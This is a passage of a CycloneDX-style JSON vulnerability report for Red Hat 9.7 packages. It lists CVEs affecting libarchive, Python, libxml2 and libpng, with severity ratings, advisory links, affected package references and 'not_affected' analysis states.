"urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2025-1632", "ratings": [ { "source": { "name": "azure" }, "severity": "low" }, { "source": { "name": "nvd" }, "score": 5.5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" }, { "source": { "name": "photon" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 3.3, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" }, { "source": { "name": "ubuntu" }, "severity": "low" } ], "cwes": [ 404, 476 ], "description": "A vulnerability was found in libarchive up to 3.7.7. It has been classified as problematic. This affects the function list of the file bsdunzip.c. The manipulation leads to null pointer dereference. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2025-1632" }, { "url": "https://access.redhat.com/security/cve/CVE-2025-1632" }, { "url": "https://github.com/Ekkosun/pocs/blob/main/bsdunzip-poc" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1632" }, { "url": "https://ubuntu.com/security/notices/USN-7454-1" }, { "url": "https://vuldb.com/?ctiid.296619" }, { "url": "https://vuldb.com/?id.296619" }, { "url": "https://vuldb.com/?submit.496460" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2025-1632" } ], "published": "2025-02-24T14:15:11+00:00", "updated": "2025-03-25T15:41:41+00:00", "affects": [ { "ref": "pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.5.3-7.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "code_not_reachable", "response": [ "update" ], "detail": null } }, { "id": "CVE-2025-1795", "ratings": [ { "source": { "name": "amazon" }, "severity": "low" }, { "source": { "name": "cbl-mariner" }, "severity": "low" }, { "source": { "name": "redhat" }, "score": 3.1, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "source": { "name": "ubuntu" }, "severity": "low" } ], "cwes": [ 116 ], "description": "During an address list folding when a separating comma ends up on a folded line and that line is to be unicode-encoded then the separator itself is also unicode-encoded. Expected behavior is that the separating comma remains a plan comma. This can result in the address header being misinterpreted by some mail servers.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2025-1795" }, { "url": "https://access.redhat.com/security/cve/CVE-2025-1795" }, { "url": "https://github.com/python/cpython/commit/09fab93c3d857496c0bd162797fab816c311ee48" }, { "url": "https://github.com/python/cpython/commit/70754d21c288535e86070ca7a6e90dcb670b8593" }, { "url": "https://github.com/python/cpython/commit/9148b77e0af91cdacaa7fe3dfac09635c3fe9a74" }, { "url": "https://github.com/python/cpython/commit/a4ef689ce670684ec132204b1cd03720c8e0a03d" }, { "url": "https://github.com/python/cpython/commit/d4df3c55e4c5513947f907f24766b34d2ae8c090" }, { "url": "https://github.com/python/cpython/issues/100884" }, { "url": "https://github.com/python/cpython/pull/100885" }, { "url": "https://github.com/python/cpython/pull/119099" }, { "url": "https://lists.debian.org/debian-lts-announce/2025/03/msg00013.html" }, { "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/MB62IZMEC3UM6SGHP5LET5JX2Y7H4ZUR/" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1795" }, { "url": "https://ubuntu.com/security/notices/USN-7570-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2025-1795" } ], "published": "2025-02-28T19:15:36+00:00", "updated": "2026-04-15T00:35:42+00:00", "affects": [ { "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "code_not_reachable", "response": [ "update" ], "detail": null } }, { "id": "CVE-2025-27113", "ratings": [ { "source": { "name": "amazon" }, "severity": "high" }, { "source": { "name": "azure" }, "severity": "low" }, { "source": { "name": "bitnami" }, "score": 7.5, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "source": { "name": "cbl-mariner" }, "severity": "low" }, { "source": { "name": "nvd" }, "score": 7.5, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "source": { "name": "photon" }, "severity": "high" }, { "source": { "name": "redhat" }, "score": 3.1, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 476 ], "description": "libxml2 before 2.12.10 and 2.13.x before 2.13.6 has a NULL pointer dereference in xmlPatMatch in pattern.c.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2025-27113" }, { "url": "http://seclists.org/fulldisclosure/2025/Apr/10" }, { "url": "http://seclists.org/fulldisclosure/2025/Apr/11" }, { "url": "http://seclists.org/fulldisclosure/2025/Apr/12" }, { "url": "http://seclists.org/fulldisclosure/2025/Apr/13" }, { "url": "http://seclists.org/fulldisclosure/2025/Apr/4" }, { "url": "http://seclists.org/fulldisclosure/2025/Apr/5" }, { "url": "http://seclists.org/fulldisclosure/2025/Apr/8" }, { "url": "http://seclists.org/fulldisclosure/2025/Apr/9" }, { "url": "https://access.redhat.com/security/cve/CVE-2025-27113" }, { "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/861" }, { "url": "https://lists.debian.org/debian-lts-announce/2025/02/msg00028.html" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27113" }, { "url": "https://security.netapp.com/advisory/ntap-20250306-0004/" }, { "url": "https://ubuntu.com/security/notices/USN-7302-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2025-27113" }, { "url": "https://www.openwall.com/lists/oss-security/2025/02/18/2" } ], "published": "2025-02-18T23:15:10+00:00", "updated": "2025-11-03T22:18:43+00:00", "affects": [ { "ref": "pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.9.13-14.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "code_not_reachable", "response": [ "update" ], "detail": null } }, { "id": "CVE-2025-28164", "ratings": [ { "source": { "name": "amazon" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 401, 120 ], "description": "Buffer Overflow vulnerability in libpng 1.6.43-1.6.46 allows a local attacker to cause a denial of service via png_create_read_struct() function.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2025-28164" }, { "url": "https://access.redhat.com/security/cve/CVE-2025-28164" }, { "url": "https://gist.github.com/kittener/506516f8c22178005b4379c8b2a7de20" }, { "url": "https://github.com/pnggroup/libpng/issues/655" }, { "url": "https://github.com/pnggroup/libpng/pull/657" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-28164" }, { "url": "https://ubuntu.com/security/notices/USN-7993-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2025-28164" } ], "published": "2026-01-27T16:16:14+00:00", "updated": "2026-03-04T19:42:07+00:00", "affects": [ { "ref": "pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2", "versions": [ { "version": "2:1.6.37-12.el9_7.2", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": 